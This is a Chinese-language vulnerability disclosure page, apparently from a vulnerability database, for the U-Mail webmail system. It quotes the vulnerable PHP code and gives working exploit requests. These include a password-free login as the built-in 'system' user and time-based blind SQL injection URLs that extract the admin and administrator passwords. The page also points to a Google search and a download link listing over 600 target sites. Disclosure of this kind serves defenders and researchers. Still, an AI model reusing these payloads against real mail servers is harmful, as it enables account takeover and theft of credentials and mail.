|U-Mail邮件系统一处接口漏洞（可sql注入，任意用户登陆，获取管理员密码）

U-Mail邮件系统一处接口漏洞（可sql注入，任意用户登陆，获取管理员密码）

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：用户量这么多的邮件系统，分分钟钟就被getshell是件很令人头疼的事情。 ### 详细说明： 1.邮件系统介绍 1）官方下载地址：http://www.comingchina.com/html/downloads/ 2）版本：最新版V9.8.57 3）测试环境：Windows Server 2003+IIS6.0+官方默认软件 4）使用案例：http://www.comingchina.com/html/case/ OR Google "Powered by U-Mail" 漏洞代码附600多url下载链接: http://pan.baidu.com/s/1nQRzo 密码: ld5k /fast/oab/module/operates.php ``` if ( ACTION == "save-to-pab" ) { include_once( LIB_PATH."PAB.php" ); $PAB = PAB::getinstance( ); $maillist_id = trim( $_GET['maillist'] ); if ( $maillist_id ) { $member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 ); if ( !$member_all ) { dump_json( array( "status" => TRUE, "message" => "" ) ); } foreach ( $member_all as $member ) { if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) ) { $data = array( "user_id" => $user_id, "fullname" => $member['FullName'], "pref_email" => $member['Mailbox'], "updated" => date( "Y-m-d H:i:s" ) ); $res = $PAB->add_contact( $data, 0 ); if ( !$res ) { dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误，添加失败！" ) ); } } } } else {//不提交maillist，进入 $user_ids = trim( $_GET['userlist'] ); if ( !$user_ids ) { dump_msg( "param_error", "参数错误！" ); } $where = "t1.UserID IN (".$user_ids.")";无单引号，产生注入 $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 ); $user_all = $arr_tmp['data']; if ( !$user_all ) { dump_json( array( "status" => TRUE, "message" => "" ) ); } ``` 函数文件 /admin/lib/Mailbox.php代码 ``` public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYwÿ = "", $_obfuscate_AedrEgÿÿ = "", $_obfuscate_xvYeh9Iÿ = "", $_obfuscate_tUi30UB0e88ÿ = "", $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ = FALSE, $_obfuscate_ySeUHBwÿ = FALSE ) { $_obfuscate_AkPSczrCIu40 = intval( $_obfuscate_AkPSczrCIu40 ); $_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0"; if ( $_obfuscate_IRFhnYwÿ ) { $_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYwÿ;//直接拼接where语句，并最终执行sql语句 } if ( $_obfuscate_xvYeh9Iÿ ) { if ( $_obfuscate_AedrEgÿÿ ) { $_obfuscate_mV9HBLYÿ = $_obfuscate_AedrEgÿÿ * $_obfuscate_xvYeh9Iÿ - $_obfuscate_xvYeh9Iÿ; } if ( $_obfuscate_mV9HBLYÿ ) { $_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_mV9HBLYÿ.",".$_obfuscate_xvYeh9Iÿ; } else { $_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_xvYeh9Iÿ; } } if ( $_obfuscate_tUi30UB0e88ÿ ) { $_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY ".$_obfuscate_tUi30UB0e88ÿ; if ( $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ ) { $_obfuscate_5e2O0TiivW7ec4cÿ .= " DESC"; } $_obfuscate_5e2O0TiivW7ec4cÿ .= ",t1.FullName ASC"; } else { $_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY t1.OrderNo DESC,t1.Mailbox ASC"; } $_obfuscate_mGXfswsMZQÿÿ = "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*\r\n\t\t\t\tFROM ".$this->get_table_name( "mailbox" )." as t1, ".$this->get_table_name( "info" )." as t2\r\n\t\t\t\tWHERE ".$_obfuscate_zbtFQY92OYenSG9u."\r\n\t\t\t\t".$_obfuscate_5e2O0TiivW7ec4cÿ; $_obfuscate_YdwIclUMQÿÿ = $_obfuscate_mGXfswsMZQÿÿ." ".$_obfuscate_UFlHiZJcJu6DQBFE; if ( $_obfuscate_ySeUHBwÿ ) { dump( $_obfuscate_YdwIclUMQÿÿ ); } $_obfuscate_MbMfEtWGUpEscGl = $this->db_count( $_obfuscate_mGXfswsMZQÿÿ ); unset( $_obfuscate_1LzzW8sGEkLaizkÿ ); $_obfuscate_6RYLWQÿÿ = $this->db_select( $_obfuscate_YdwIclUMQÿÿ, "more" ); return array( "count" => $_obfuscate_MbMfEtWGUpEscGl, "data" => $_obfuscate_6RYLWQÿÿ ); } ``` 无需登录的原因是，邮箱系统有system的默认用户，且该文件并未验证用户的密码，只要提交用户名，即认为登录成功，并可进行一系列操作。首先执行 http://mail.fuck.com/webmail/fast/index.php?module=operate&action=login 向其post如下数据mailbox=system@fuck.com&link=? 如图，登录成功，虽然页面不显示，但所有的函数都可以执行 [<img src="https://images.seebug.org/upload/201501/21202242ffbf46df074cab72551b04b68cb7caff.png" alt="a.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/21202242ffbf46df074cab72551b04b68cb7caff.png) 然后执行， http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1) 执行的sql语句为 ``` 150121 20:11:25 2263 Connectumail@localhost on 2263 QuerySET NAMES 'UTF8' 2263 Init DBumail 2263 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1)) ORDER BY t1.OrderNo DESC,t1.Mailbox ASC ``` [<img src="https://images.seebug.org/upload/201501/21202319273d11ffada5220a711654dd888ee2df.png" alt="b.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/21202319273d11ffada5220a711654dd888ee2df.png) 查看响应 [<img src="https://images.seebug.org/upload/201501/2120241377108cb03a4a7d0c3f5f10ef5c662ec3.png" alt="c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2120241377108cb03a4a7d0c3f5f10ef5c662ec3.png) 然后读取管理员密码，即可对所有用户及邮件操作，管理表为web_usr [<img src="https://images.seebug.org/upload/201501/2120244507eeb033a6f8eb8e995782d9a8408d15.png" alt="d.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2120244507eeb033a6f8eb8e995782d9a8408d15.png) exp中不能引入单引号，所以读取admin 和administrator的exp分别为 http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from web_usr where role_code=1),1,1))=97,sleep(5),1) http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where role_code=2),1,1))=97,sleep(5),1) ### 漏洞证明：如上

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™